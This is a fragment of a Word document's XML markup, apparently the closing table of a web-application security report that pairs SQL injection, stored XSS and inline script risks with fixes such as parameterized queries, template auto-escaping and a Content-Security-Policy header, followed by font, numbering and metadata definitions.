              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17DB5456" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>String concatenation of user input into SQL query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4081" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="543F21C3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parameterized queries with ? placeholders — input treated as data, not SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00892D2F" w14:paraId="2A03628E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2199" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F9FF"/>
          </w:tcPr>
          <w:p w14:paraId="173D4111" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F9FF"/>
          </w:tcPr>
          <w:p w14:paraId="23F5F442" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>|safe filter disabling auto-escaping; raw HTML string building</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4081" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F9FF"/>
          </w:tcPr>
          <w:p w14:paraId="2DA83B9B" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Template loop with {{ row[0] }} — Jinja2 auto-escaping encodes all HTML chars</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00892D2F" w14:paraId="1B68B53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5EE8B2BB" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Inline Script Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="201DA546" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>No script execution policy enforced by browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4081" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C5A3324" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Content-Security-Policy header restricting scripts to same origin only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AFC96E3" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673533C4" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00892D2F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0FD3F8" w14:textId="77777777" w:rsidR="00892D2F" w:rsidRDefault="00E10FAA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>End of Report</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00892D2F">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font>
  <w:font w:name="Arial">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Noto Sans">
    <w:panose1 w:val="020B0502040504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="FreeSans">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322B7"/>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D795B32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>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446196546">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1978030088">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="17804167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D2F"/>
    <w:rsid w:val="004C1579"/>
    <w:rsid w:val="00892D2F"/>
    <w:rsid w:val="00E10FA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0B1ED1D"/>
  <w15:docId w15:val="{989A70E2-2FDC-F94C-B131-4DBFAB05E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4B5"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="20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1915</Words>
  <Characters>10919</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>90</Lines>
  <Paragraphs>25</Paragraphs>
  <ScaleCrop>false</ScaleCrop>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Henry Omondi</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-22T11:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T13:06:00Z</dcterms:modified>
  <dc:language>en-US</dc:language>
</cp:coreProperties>
</file>